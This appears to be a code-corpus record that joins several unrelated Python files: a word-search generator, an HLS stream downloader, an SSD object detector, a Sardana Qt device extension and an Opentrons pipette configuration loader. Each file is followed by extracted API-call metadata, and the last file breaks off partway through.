x, y = start_x, start_y
for i in range(len(word)):
if grid[y][x] == ' ' or grid[y][x] == word[i]:
pass
else:
valid_spot = False
tries -= 1
break
x += vel[0]
y += vel[1]
if tries <= 0:
done = True
if valid_spot:
x, y = start_x, start_y
for i in range(len(word)):
grid[y][x] = word[i].upper()
x += vel[0]
y += vel[1]
done = True
alphabet = 'qwertyuiopasdfghjklzxcvbnm'.upper()
for i in range(len(grid)):
for j in range(len(grid[0])):
if grid[i][j] == ' ':
grid[i][j] = choice(alphabet)
return grid
def draw_grid(grid):
screen = ''
for row in grid:
screen += '\n'
do_once = True
for tile in row:
if do_once:
screen += '|'
do_once = False
screen += tile + '|'
print(screen)
def use_random():
path = 'words.txt'
if os.path.exists(path):
with open(path, 'r') as file:
temp = file.readlines()
class wrd():
def __init__(self, word):
self.word = word
self.index = randint(0, 1000)
def __lt__(self, other):
return self.index < other.index
words = []
word_count = 5
for word in temp:
w = word.replace('\n', '')
words.append(wrd(w))
words.sort()
temp = []
for i in range(word_count):
temp.append(words[i].word)
return temp
def get_details():
# width
while True:
w = input('\nWhat is the width of the grid in characters?\n[>> ')
if w.isdigit():
w = int(w)
break
# height
while True:
h = input('\nWhat is the height of the grid in characters?\n[>> ')
if h.isdigit():
h = int(h)
break
# words
words = []
while True:
wrd = input('Please add the words to the bank, you can press ENTER to use random words and press "q" when you\'re finished.\n[>> ').strip().lower()
if wrd == '':
words = use_random()
break
if wrd == 'q':
break
for let in wrd:
if let not in 'qwertyuiopasdfghjklzxcvbnm':
print('Invalid word, words can only contain the following letters:', ''.join(i for i in sorted('qwertyuiopasdfghjklzxcvbnm')))
break
else:
words.append(wrd)
return w, h, words
def clear():
print('\n' * 50)
width, height, words = get_details()
while True:
grid = generate_grid(width, height)
grid = populate_grid(words, grid)
clear()
draw_grid(grid)
input('>')
| [
"os.path.exists",
"random.choice",
"random.randint"
] | [((2009, 2029), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (2023, 2029), False, 'import os\n'), ((600, 632), 'random.choice', 'choice', (['[(1, 0), (0, 1), (1, 1)]'], {}), '([(1, 0), (0, 1), (1, 1)])\n', (606, 632), False, 'from random import choice, randint\n'), ((1621, 1637), 'random.choice', 'choice', (['alphabet'], {}), '(alphabet)\n', (1627, 1637), False, 'from random import choice, randint\n'), ((2246, 2262), 'random.randint', 'randint', (['(0)', '(1000)'], {}), '(0, 1000)\n', (2253, 2262), False, 'from random import choice, randint\n')] |
import sys, os, asyncio, shutil
import wget
from ffmpeg import FFmpeg
# Func calls wget to download the file given in url arg
def webget(url):
wget.download(url)
# Fuc calls ffmpeg to transcode .m3u8 to .mp4
def transcode(ffmpeg):
@ffmpeg.on('stderr')
def on_stderr(line):
print(line)
@ffmpeg.on('progress')
def on_progress(progress):
print(progress)
@ffmpeg.on('completed')
def on_completed():
print('\nCompleted')
@ffmpeg.on('error')
def on_error(code):
print('Error:', code)
loop = asyncio.get_event_loop()
loop.run_until_complete(ffmpeg.execute())
loop.close()
def parse_m3u8_url(input_url):
    """Split a playlist URL into ``(base_url, playlist_filename)``.

    ``base_url`` keeps its trailing slash; any query string (``?token=...``)
    is stripped from the returned filename.

    :param input_url: full URL of the .m3u8 playlist
    :return: tuple ``(base URL including trailing '/', bare playlist name)``
    """
    # rpartition avoids the old ``input_url[:-len(name)]`` slice, which
    # returned an empty base URL whenever the URL ended with '/'
    # (len('') == 0, and a ``[:-0]`` slice is the empty string).
    head, sep, input_m3u8 = input_url.rpartition('/')
    base_url = head + sep
    # Drop a query string such as "?token=..." from the filename.
    if '?' in input_m3u8:
        input_m3u8 = input_m3u8.split('?')[0]
    return base_url, input_m3u8
def create_manifest(input_m3u8):
    """Rewrite ``./<input_m3u8>`` as ``./manifest.m3u8`` with local names.

    Tokenised URLs (containing 'http', '?', and '=') are kept verbatim;
    plain ``https`` segment URLs are reduced to their final path component;
    every other line is copied through unchanged.

    :param input_m3u8: playlist filename in the current working directory
    """
    with open(f'./{input_m3u8}', 'r') as f:
        lines = f.readlines()
    manifest = []
    for el in lines:
        # Strip only the newline: the old ``el[:-1]`` chopped a real
        # character off a final line that had no trailing newline.
        el = el.rstrip('\n')
        if 'http' in el and '?' in el and '=' in el:
            manifest.append(el)
        elif 'https' in el:
            manifest.append(el.split('/')[-1])
        else:
            manifest.append(el)
    # NOTE(review): append mode means re-running the script duplicates
    # entries in manifest.m3u8 -- confirm whether 'w' was intended.
    with open('./manifest.m3u8', 'a') as f:
        for elm in manifest:
            f.write(elm + '\n')
def cleanup_working_dir(input_m3u8, storage_folder):
    """Package build artefacts from the CWD into ``storage_folder``.

    The transcoded .mp4 is moved to ``storage_folder/``; the playlist
    files and downloaded .ts segments are moved to the nested
    ``storage_folder/storage_folder/`` directory.

    :param input_m3u8: playlist filename (used in the log message)
    :param storage_folder: destination directory, created if missing
    """
    try:
        # Create folder given in arg
        os.mkdir(storage_folder)
    except FileExistsError:
        print('\nWARNING: Output folder exists')
    cwd = os.getcwd()
    files = os.listdir()
    print(f'\nMESSAGE: Cleaning up and Packaging things nicely')
    os.mkdir(f'{storage_folder}/{storage_folder}')
    # Destination directories, computed once instead of per matching file.
    mp4_target = f'{cwd}/{storage_folder}'
    part_target = f'{cwd}/{storage_folder}/{storage_folder}'
    for f in files:
        # endswith('.mp4') is stricter than the old ``f[-3:] == 'mp4'`` /
        # ``f[-2:] == 'ts'`` checks, which also matched dot-less names
        # such as "clip_mp4" or "parts".
        if f.endswith('.mp4'):
            print(f'\nMESSAGE: Moving {input_m3u8} to {storage_folder}')
            shutil.move(f'{cwd}/{f}', mp4_target)
        elif f.endswith(('.m3u8', '.ts')):
            shutil.move(f'{cwd}/{f}', part_target)
# Read cli args : 'hls-downloader.py ["m3u8_url"] ["mp4_output_name"] ["storage_folder"]'
input_url = sys.argv[1]
output_filename = sys.argv[2]
storage_folder = "./site/media"
base_url, input_m3u8 = parse_m3u8_url(input_url)
# Download the playlist itself unless it is already in the CWD.
if input_m3u8 in os.listdir():
    print(f'WARNING: {input_m3u8} already exists')
else:
    print(f'MESSAGE: Downloading m3u8 file')
    webget(input_url)
print(f'\nMESSAGE: Creating manifest.m3u8')
create_manifest(input_m3u8)
print(f'\nMESSAGE: Reading {input_m3u8}')
# Pick which playlist to walk: movcloud hosts ship a separate
# playlist.m3u8; otherwise use the locally generated manifest.
data = None
if 'movcloud' in input_url:
    with open('playlist.m3u8', 'r') as f:
        data = f.read()
elif 'manifest.m3u8' in os.listdir():
    with open('manifest.m3u8', 'r') as f:
        data = f.read()
if data != None:
    contents = data.split('\n')
    print(f'\nMESSAGE: Attempting to download items from {input_m3u8}')
    # Fetch every segment referenced by the playlist, skipping files
    # already present in the CWD.
    for item in contents:
        if item in os.listdir():
            continue
        if 'http' in item and '?' in item and '=' in item:
            webget(item)
        if 'movcloud' in item:
            item_sp = item.split('/')
            if item_sp[len(item_sp)-1] in os.listdir():
                continue
            else:
                webget(item)
        else:
            stxt = item[0:5]
            entxt = item[-2:]
            if stxt == 'https':
                # NOTE(review): ``l``/``name`` are computed but unused here.
                l = item.split('/')
                name = item[len(l)-1]
                webget(item)
            elif entxt == 'ts':
                # Relative segment name: prepend the playlist's base URL.
                cut = slice(0,-len(input_m3u8))
                webget(input_url[cut] + item)
# Configuring ffmpeg
## ffmpeg -i "./folder/file.m3u8" -c copy file.mp4
_ffmpeg = FFmpeg().option('n').input('./manifest.m3u8').output(output_filename,{'c': 'copy'})
print(f'\n\nMESSAGE: Running command: ffmpeg -i ./manifest.m3u8 -c copy {output_filename}')
transcode(_ffmpeg)
cleanup_working_dir(input_m3u8, storage_folder)
| [
"wget.download",
"os.listdir",
"shutil.move",
"os.getcwd",
"os.mkdir",
"asyncio.get_event_loop",
"ffmpeg.FFmpeg"
] | [((148, 166), 'wget.download', 'wget.download', (['url'], {}), '(url)\n', (161, 166), False, 'import wget\n'), ((563, 587), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (585, 587), False, 'import sys, os, asyncio, shutil\n'), ((1669, 1680), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1678, 1680), False, 'import sys, os, asyncio, shutil\n'), ((1693, 1705), 'os.listdir', 'os.listdir', ([], {}), '()\n', (1703, 1705), False, 'import sys, os, asyncio, shutil\n'), ((1776, 1822), 'os.mkdir', 'os.mkdir', (['f"""{storage_folder}/{storage_folder}"""'], {}), "(f'{storage_folder}/{storage_folder}')\n", (1784, 1822), False, 'import sys, os, asyncio, shutil\n'), ((2798, 2810), 'os.listdir', 'os.listdir', ([], {}), '()\n', (2808, 2810), False, 'import sys, os, asyncio, shutil\n'), ((1555, 1579), 'os.mkdir', 'os.mkdir', (['storage_folder'], {}), '(storage_folder)\n', (1563, 1579), False, 'import sys, os, asyncio, shutil\n'), ((3186, 3198), 'os.listdir', 'os.listdir', ([], {}), '()\n', (3196, 3198), False, 'import sys, os, asyncio, shutil\n'), ((2121, 2150), 'shutil.move', 'shutil.move', (['original', 'target'], {}), '(original, target)\n', (2132, 2150), False, 'import sys, os, asyncio, shutil\n'), ((2308, 2337), 'shutil.move', 'shutil.move', (['original', 'target'], {}), '(original, target)\n', (2319, 2337), False, 'import sys, os, asyncio, shutil\n'), ((2493, 2522), 'shutil.move', 'shutil.move', (['original', 'target'], {}), '(original, target)\n', (2504, 2522), False, 'import sys, os, asyncio, shutil\n'), ((3433, 3445), 'os.listdir', 'os.listdir', ([], {}), '()\n', (3443, 3445), False, 'import sys, os, asyncio, shutil\n'), ((3666, 3678), 'os.listdir', 'os.listdir', ([], {}), '()\n', (3676, 3678), False, 'import sys, os, asyncio, shutil\n'), ((2206, 2217), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2215, 2217), False, 'import sys, os, asyncio, shutil\n'), ((2248, 2259), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2257, 2259), False, 'import sys, 
os, asyncio, shutil\n'), ((2391, 2402), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2400, 2402), False, 'import sys, os, asyncio, shutil\n'), ((2433, 2444), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2442, 2444), False, 'import sys, os, asyncio, shutil\n'), ((4171, 4179), 'ffmpeg.FFmpeg', 'FFmpeg', ([], {}), '()\n', (4177, 4179), False, 'from ffmpeg import FFmpeg\n')] |
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from detector.ssd.utils import box_utils
from nn.separable_conv_2d import SeparableConv2d
from fpn.extension import Extension
from detector.ssd.to_predictions import ToPredictions
class SSD(nn.Module):
    """Single Shot MultiBox Detector head built on a pluggable backbone.

    Six feature maps feed the classification/regression headers: the last
    two backbone feature maps plus the four extra maps produced by the
    ``Extension`` module.  Each header predicts 6 anchors per location.
    """

    def __init__(self, num_classes, backbone, arch_name,
                 batch_size=None, config=None):
        """Compose a SSD model using the given components.

        :param num_classes: number of object classes to predict
        :param backbone: feature extractor exposing ``feature_channels()``
        :param arch_name: identifier string for this architecture
        :param batch_size: optional fixed batch size; when set it replaces
            ``x.size(0)`` in ``compute_header`` (eases inference export)
        :param config: optional prior-box configuration object
        """
        super(SSD, self).__init__()
        self.num_classes = num_classes
        self.backbone = backbone
        self.arch_name = arch_name
        self.batch_size = batch_size  # to ease the inference model

        feature_channels = self.backbone.feature_channels()

        self.extras = Extension(
            bootstrap_channels=feature_channels[-1],
            out_channels=[512, 256, 256, 64],
            conv=SeparableConv2d)

        # One classification header per feature map; each outputs
        # 6 * num_classes channels (6 anchors per spatial location).
        self.classification_headers = nn.ModuleList([
            SeparableConv2d(in_channels=feature_channels[-2],
                            out_channels=6 * num_classes,
                            kernel_size=3, padding=1),
            SeparableConv2d(in_channels=feature_channels[-1],
                            out_channels=6 * num_classes,
                            kernel_size=3, padding=1),
            SeparableConv2d(in_channels=512, out_channels=6 * num_classes,
                            kernel_size=3, padding=1),
            SeparableConv2d(in_channels=256, out_channels=6 * num_classes,
                            kernel_size=3, padding=1),
            SeparableConv2d(in_channels=256, out_channels=6 * num_classes,
                            kernel_size=3, padding=1),
            nn.Conv2d(in_channels=64, out_channels=6 * num_classes,
                      kernel_size=1),
        ])

        # Matching regression headers; each outputs 6 * 4 channels
        # (4 box-offset values per anchor).
        self.regression_headers = nn.ModuleList([
            SeparableConv2d(in_channels=feature_channels[-2],
                            out_channels=6 * 4,
                            kernel_size=3, padding=1, onnx_compatible=False),
            SeparableConv2d(in_channels=feature_channels[-1],
                            out_channels=6 * 4, kernel_size=3,
                            padding=1, onnx_compatible=False),
            SeparableConv2d(in_channels=512, out_channels=6 * 4, kernel_size=3,
                            padding=1, onnx_compatible=False),
            SeparableConv2d(in_channels=256, out_channels=6 * 4, kernel_size=3,
                            padding=1, onnx_compatible=False),
            SeparableConv2d(in_channels=256, out_channels=6 * 4, kernel_size=3,
                            padding=1, onnx_compatible=False),
            nn.Conv2d(in_channels=64, out_channels=6 * 4, kernel_size=1),
        ])

        self.config = config

    def forward(self, x):
        """Return ``(confidences, locations)`` concatenated over all maps.

        ``confidences`` is (batch, num_priors, num_classes) and
        ``locations`` is (batch, num_priors, 4), per ``compute_header``.
        """
        confidences = []
        locations = []
        cs = self.backbone.forward(x)
        cs = cs[-2:]  # only the last two backbone feature maps feed headers
        for i, c in enumerate(cs):
            confidence, location = self.compute_header(i, c)
            x = c  # deepest backbone map becomes the input for the extras
            confidences.append(confidence)
            locations.append(location)
        extra_x = self.extras.forward(x)
        header_index = i + 1
        for ex in extra_x:
            confidence, location = self.compute_header(header_index, ex)
            header_index += 1
            confidences.append(confidence)
            locations.append(location)
        confidences = torch.cat(confidences, 1)
        locations = torch.cat(locations, 1)
        return confidences, locations

    def compute_header(self, i, x):
        """Apply the i-th classification/regression header pair to map x."""
        batch_size = self.batch_size or x.size(0)
        confidence = self.classification_headers[i](x)
        confidence = confidence.permute(0, 2, 3, 1).contiguous()
        confidence = confidence.reshape(batch_size, -1, self.num_classes)
        location = self.regression_headers[i](x)
        location = location.permute(0, 2, 3, 1).contiguous()
        location = location.reshape(batch_size, -1, 4)
        return confidence, location

    def load_backbone_weights(self, path):
        """Load backbone weights from ``path`` onto CPU (strict key match)."""
        self.backbone.load_state_dict(
            torch.load(path, map_location=lambda storage, loc: storage),
            strict=True)

    def freeze_backbone(self):
        """Exclude all backbone parameters from gradient updates."""
        for p in self.backbone.parameters():
            p.requires_grad = False
class SSDInference(SSD):
    """SSD variant that decodes raw head outputs into final predictions."""

    def __init__(self, num_classes, backbone, arch_name,
                 batch_size=None, config=None):
        super(SSDInference, self).__init__(num_classes, backbone, arch_name,
                                           batch_size, config)
        # Decodes (confidences, locations) against the configured priors.
        self.to_predictions = ToPredictions(self.config.priors,
                                            self.config.center_variance,
                                            self.config.size_variance)

    def forward(self, x):
        """Return ``(confidences, boxes)`` decoded from the raw SSD output."""
        confidences, locations = super(SSDInference, self).forward(x)
        confidences, boxes = self.to_predictions.forward(confidences, locations)
        return confidences, boxes
| [
"torch.load",
"fpn.extension.Extension",
"detector.ssd.to_predictions.ToPredictions",
"torch.nn.Conv2d",
"nn.separable_conv_2d.SeparableConv2d",
"torch.cat"
] | [((705, 816), 'fpn.extension.Extension', 'Extension', ([], {'bootstrap_channels': 'feature_channels[-1]', 'out_channels': '[512, 256, 256, 64]', 'conv': 'SeparableConv2d'}), '(bootstrap_channels=feature_channels[-1], out_channels=[512, 256, \n 256, 64], conv=SeparableConv2d)\n', (714, 816), False, 'from fpn.extension import Extension\n'), ((2943, 2968), 'torch.cat', 'torch.cat', (['confidences', '(1)'], {}), '(confidences, 1)\n', (2952, 2968), False, 'import torch\n'), ((2983, 3006), 'torch.cat', 'torch.cat', (['locations', '(1)'], {}), '(locations, 1)\n', (2992, 3006), False, 'import torch\n'), ((4002, 4096), 'detector.ssd.to_predictions.ToPredictions', 'ToPredictions', (['self.config.priors', 'self.config.center_variance', 'self.config.size_variance'], {}), '(self.config.priors, self.config.center_variance, self.config.\n size_variance)\n', (4015, 4096), False, 'from detector.ssd.to_predictions import ToPredictions\n'), ((3551, 3610), 'torch.load', 'torch.load', (['path'], {'map_location': '(lambda storage, loc: storage)'}), '(path, map_location=lambda storage, loc: storage)\n', (3561, 3610), False, 'import torch\n'), ((874, 983), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': 'feature_channels[-2]', 'out_channels': '(6 * num_classes)', 'kernel_size': '(3)', 'padding': '(1)'}), '(in_channels=feature_channels[-2], out_channels=6 *\n num_classes, kernel_size=3, padding=1)\n', (889, 983), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((1022, 1131), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': 'feature_channels[-1]', 'out_channels': '(6 * num_classes)', 'kernel_size': '(3)', 'padding': '(1)'}), '(in_channels=feature_channels[-1], out_channels=6 *\n num_classes, kernel_size=3, padding=1)\n', (1037, 1131), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((1170, 1263), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': '(512)', 
'out_channels': '(6 * num_classes)', 'kernel_size': '(3)', 'padding': '(1)'}), '(in_channels=512, out_channels=6 * num_classes, kernel_size=\n 3, padding=1)\n', (1185, 1263), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((1282, 1375), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': '(256)', 'out_channels': '(6 * num_classes)', 'kernel_size': '(3)', 'padding': '(1)'}), '(in_channels=256, out_channels=6 * num_classes, kernel_size=\n 3, padding=1)\n', (1297, 1375), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((1394, 1487), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': '(256)', 'out_channels': '(6 * num_classes)', 'kernel_size': '(3)', 'padding': '(1)'}), '(in_channels=256, out_channels=6 * num_classes, kernel_size=\n 3, padding=1)\n', (1409, 1487), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((1506, 1576), 'torch.nn.Conv2d', 'nn.Conv2d', ([], {'in_channels': '(64)', 'out_channels': '(6 * num_classes)', 'kernel_size': '(1)'}), '(in_channels=64, out_channels=6 * num_classes, kernel_size=1)\n', (1515, 1576), True, 'import torch.nn as nn\n'), ((1644, 1766), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': 'feature_channels[-2]', 'out_channels': '(6 * 4)', 'kernel_size': '(3)', 'padding': '(1)', 'onnx_compatible': '(False)'}), '(in_channels=feature_channels[-2], out_channels=6 * 4,\n kernel_size=3, padding=1, onnx_compatible=False)\n', (1659, 1766), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((1805, 1927), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': 'feature_channels[-1]', 'out_channels': '(6 * 4)', 'kernel_size': '(3)', 'padding': '(1)', 'onnx_compatible': '(False)'}), '(in_channels=feature_channels[-1], out_channels=6 * 4,\n kernel_size=3, padding=1, onnx_compatible=False)\n', (1820, 1927), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((1966, 2072), 
'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': '(512)', 'out_channels': '(6 * 4)', 'kernel_size': '(3)', 'padding': '(1)', 'onnx_compatible': '(False)'}), '(in_channels=512, out_channels=6 * 4, kernel_size=3, padding\n =1, onnx_compatible=False)\n', (1981, 2072), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((2091, 2197), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': '(256)', 'out_channels': '(6 * 4)', 'kernel_size': '(3)', 'padding': '(1)', 'onnx_compatible': '(False)'}), '(in_channels=256, out_channels=6 * 4, kernel_size=3, padding\n =1, onnx_compatible=False)\n', (2106, 2197), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((2216, 2322), 'nn.separable_conv_2d.SeparableConv2d', 'SeparableConv2d', ([], {'in_channels': '(256)', 'out_channels': '(6 * 4)', 'kernel_size': '(3)', 'padding': '(1)', 'onnx_compatible': '(False)'}), '(in_channels=256, out_channels=6 * 4, kernel_size=3, padding\n =1, onnx_compatible=False)\n', (2231, 2322), False, 'from nn.separable_conv_2d import SeparableConv2d\n'), ((2341, 2401), 'torch.nn.Conv2d', 'nn.Conv2d', ([], {'in_channels': '(64)', 'out_channels': '(6 * 4)', 'kernel_size': '(1)'}), '(in_channels=64, out_channels=6 * 4, kernel_size=1)\n', (2350, 2401), True, 'import torch.nn as nn\n')] |
#!/usr/bin/env python
##############################################################################
##
# This file is part of Sardana
##
# http://www.sardana-controls.org/
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Sardana is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Sardana is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
# You should have received a copy of the GNU Lesser General Public License
# along with Sardana. If not, see <http://www.gnu.org/licenses/>.
##
##############################################################################
"""Device pool extension for taurus Qt"""
__all__ = ["QPool", "QMeasurementGroup",
"registerExtensions"]
import json
from taurus.external.qt import Qt
from taurus.core.taurusbasetypes import TaurusEventType
from taurus.core.tango import TangoDevice
# Event types treated as plain value updates (vs. config/error events).
CHANGE_EVTS = TaurusEventType.Change, TaurusEventType.Periodic
class QPool(Qt.QObject, TangoDevice):
    """Qt-enabled TangoDevice wrapper for a Sardana Pool device."""

    def __init__(self, name='', qt_parent=None, **kw):
        # call__init__/call__init__wo_kw route the arguments to each base
        # class separately (Taurus multiple-inheritance helper).
        self.call__init__(TangoDevice, name, **kw)
        self.call__init__wo_kw(Qt.QObject, qt_parent)
class QMeasurementGroup(Qt.QObject, TangoDevice):
    """Qt-enabled TangoDevice wrapper for a Sardana MeasurementGroup.

    Caches the JSON-decoded ``Configuration`` attribute and emits
    ``configurationChanged`` whenever it changes on the server.
    """

    configurationChanged = Qt.pyqtSignal()

    def __init__(self, name='', qt_parent=None, **kw):
        self.call__init__(TangoDevice, name, **kw)
        self.call__init__wo_kw(Qt.QObject, qt_parent)

        self._config = None
        self.__configuration = self.getAttribute("Configuration")
        self.__configuration.addListener(self._configurationChanged)

    def __getattr__(self, name):
        # Resolve missing attributes through both base classes, Qt first.
        try:
            return Qt.QObject.__getattr__(self, name)
        except AttributeError:
            return TangoDevice.__getattr__(self, name)

    def _configurationChanged(self, s, t, v):
        """Taurus listener: refresh the cached config on change events."""
        if t == TaurusEventType.Config:
            return
        # BUG FIX: the original tested ``if TaurusEventType.Error:`` which
        # is always truthy, so the cache was unconditionally reset to None
        # and the decoded value below was unreachable.
        if t == TaurusEventType.Error:
            self._config = None
        else:
            self._config = json.loads(v.value)
        self.configurationChanged.emit()

    def getConfiguration(self, cache=True):
        """Return the configuration dict, re-reading when not cached."""
        if self._config is None or not cache:
            try:
                v = self.read_attribute("configuration")
                self._config = json.loads(v.value)
            except Exception:
                # Narrowed from a bare ``except:`` so KeyboardInterrupt /
                # SystemExit are no longer swallowed; best-effort semantics
                # (return None on failure) are preserved.
                self._config = None
        return self._config

    def setConfiguration(self, config):
        """JSON-encode *config* and write it to the device."""
        self.write_attribute("configuration", json.dumps(config))
def registerExtensions():
    """Registers the pool extensions in the :class:`taurus.core.tango.TangoFactory`"""
    import taurus
    #import sardana.taurus.core.tango.sardana.pool
    # sardana.taurus.core.tango.sardana.pool.registerExtensions()
    factory = taurus.Factory()
    # Only MeasurementGroup is registered; the Pool registration below is
    # deliberately left disabled.
    #factory.registerDeviceClass('Pool', QPool)
    factory.registerDeviceClass('MeasurementGroup', QMeasurementGroup)
| [
"taurus.Factory",
"json.loads",
"taurus.core.tango.TangoDevice.__getattr__",
"json.dumps",
"taurus.external.qt.Qt.QObject.__getattr__",
"taurus.external.qt.Qt.pyqtSignal"
] | [((1575, 1590), 'taurus.external.qt.Qt.pyqtSignal', 'Qt.pyqtSignal', ([], {}), '()\n', (1588, 1590), False, 'from taurus.external.qt import Qt\n'), ((3048, 3064), 'taurus.Factory', 'taurus.Factory', ([], {}), '()\n', (3062, 3064), False, 'import taurus\n'), ((1982, 2016), 'taurus.external.qt.Qt.QObject.__getattr__', 'Qt.QObject.__getattr__', (['self', 'name'], {}), '(self, name)\n', (2004, 2016), False, 'from taurus.external.qt import Qt\n'), ((2316, 2335), 'json.loads', 'json.loads', (['v.value'], {}), '(v.value)\n', (2326, 2335), False, 'import json\n'), ((2764, 2782), 'json.dumps', 'json.dumps', (['config'], {}), '(config)\n', (2774, 2782), False, 'import json\n'), ((2067, 2102), 'taurus.core.tango.TangoDevice.__getattr__', 'TangoDevice.__getattr__', (['self', 'name'], {}), '(self, name)\n', (2090, 2102), False, 'from taurus.core.tango import TangoDevice\n'), ((2573, 2592), 'json.loads', 'json.loads', (['v.value'], {}), '(v.value)\n', (2583, 2592), False, 'import json\n')] |
import logging
import os
import json
from collections import namedtuple
from opentrons.config import get_config_index
# Absolute directory of this module, used as a path anchor.
FILE_DIR = os.path.abspath(os.path.dirname(__file__))
log = logging.getLogger(__name__)
def pipette_config_path():
    """Return the pipette settings file path from the config index.

    Falls back to ``./settings.json`` when the index has no
    ``pipetteConfigFile`` entry.
    """
    return get_config_index().get('pipetteConfigFile', './settings.json')
# Record type holding one pipette model's calibration/configuration values.
pipette_config = namedtuple(
    'pipette_config',
    [
        'plunger_positions',
        'pick_up_current',
        'aspirate_flow_rate',
        'dispense_flow_rate',
        'ul_per_mm',
        'channels',
        'name',
        'model_offset',
        'plunger_current',
        'drop_tip_current',
        'tip_length'  # TODO (andy): remove from pipette, move to tip-rack
    ]
)
def _create_config_from_dict(cfg: dict, model: str) -> pipette_config:
    """Build a ``pipette_config`` from a JSON dict, filling gaps from the
    hard-coded fallback config for *model*.

    Returns ``None`` when a required key is missing or the JSON payload
    is malformed (the error is logged).
    """
    def _dict_key_to_config_attribute(key: str) -> str:
        '''
        Converts the JSON key syntax (eg: "plungerPositions"), to the format
        used in the namedtuple `plunger_config` (eg: "plunger_positions")
        '''
        return ''.join([
            '_{}'.format(c.lower()) if c.isupper() else c
            for c in key
        ])

    def _load_config_value(config_dict: dict, key: str):
        '''
        Retrieves a given key from the loaded JSON config dict. If that key is
        not present in the dictionary, it falls back to the value from
        the namedtuple `plunger_config`, named "fallback"
        '''
        nonlocal model
        fallback_cfg = fallback_configs.get(model)
        fallback_key = _dict_key_to_config_attribute(key)
        fallback_value = getattr(fallback_cfg, fallback_key)
        return config_dict.get(key, fallback_value)

    res = None
    try:
        plunger_pos = _load_config_value(cfg, 'plungerPositions')
        res = pipette_config(
            plunger_positions={
                'top': plunger_pos['top'],
                'bottom': plunger_pos['bottom'],
                # Accept both camelCase and snake_case spellings.
                'blow_out': plunger_pos.get(
                    'blowOut', plunger_pos.get('blow_out')),
                'drop_tip': plunger_pos.get(
                    'dropTip', plunger_pos.get('drop_tip')),
            },
            pick_up_current=_load_config_value(cfg, 'pickUpCurrent'),
            aspirate_flow_rate=_load_config_value(
                cfg, 'aspirateFlowRate'),
            dispense_flow_rate=_load_config_value(
                cfg, 'dispenseFlowRate'),
            ul_per_mm=_load_config_value(cfg, 'ulPerMm'),
            channels=_load_config_value(cfg, 'channels'),
            name=model,
            model_offset=_load_config_value(cfg, 'modelOffset'),
            plunger_current=_load_config_value(cfg, 'plungerCurrent'),
            drop_tip_current=_load_config_value(cfg, 'dropTipCurrent'),
            tip_length=_load_config_value(cfg, 'tipLength')
        )
    except (KeyError, json.decoder.JSONDecodeError) as e:
        log.error('Error when loading pipette config: {}'.format(e))
    return res
def _load_config_dict_from_file(pipette_model: str) -> dict:
    """Read the raw config dict for *pipette_model* from the settings file.

    Returns ``{}`` when the settings file does not exist; raises
    ``KeyError`` when the file exists but lacks *pipette_model*.
    """
    config_file = pipette_config_path()
    if not os.path.exists(config_file):
        return {}
    with open(config_file) as conf:
        return json.load(conf)[pipette_model]
# ------------------------- deprecated data ---------------------------
# This section is left in as a fall-back until the settings file is
# available on all robots. Currently, getting the settings file onto
# the robots requires a Resin push, which involves some pain to users
# because it restarts the robot--even if a protocol run is in progress.
# The preferred solution is to implement a server endpoint that will
# accept a data packet and save it in the robot, the same way that API
# server updates are currently done. Once that is in place, the app can
# ship the required data to the robot and this fallback data can be
# removed from server code. Delete from here to "end deprecated data"
# below, and remove the `select_config` call from the `config` dict
# comprehension.
# Geometry shared by all 8-channel pipettes (millimetres).
DISTANCE_BETWEEN_NOZZLES = 9
NUM_MULTI_CHANNEL_NOZZLES = 8
MULTI_LENGTH = (NUM_MULTI_CHANNEL_NOZZLES - 1) * DISTANCE_BETWEEN_NOZZLES
Y_OFFSET_MULTI = MULTI_LENGTH / 2
Z_OFFSET_MULTI = -25.8

Z_OFFSET_P10 = -13  # longest single-channel pipette
Z_OFFSET_P50 = 0
Z_OFFSET_P300 = 0
Z_OFFSET_P1000 = 20  # shortest single-channel pipette

DEFAULT_ASPIRATE_SECONDS = 2
DEFAULT_DISPENSE_SECONDS = 1

# TODO (ben 20180511): should we read these values from
# TODO /shared-data/robot-data/pipette-config.json ? Unclear,
# TODO because this is the backup in case that behavior fails,
# TODO but we could make it more reliable if we start bundling
# TODO config data into the wheel file perhaps. Needs research.

# Hard-coded fallback configs, one per supported pipette model.  Used when
# the settings file is missing or incomplete (see _load_config_value).
p10_single = pipette_config(
    plunger_positions={
        'top': 19,
        'bottom': 2.5,
        'blow_out': -0.5,
        'drop_tip': -4
    },
